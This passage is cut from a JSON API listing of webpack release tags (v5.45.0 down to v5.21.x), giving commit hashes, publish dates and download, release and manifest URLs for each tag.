itHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","down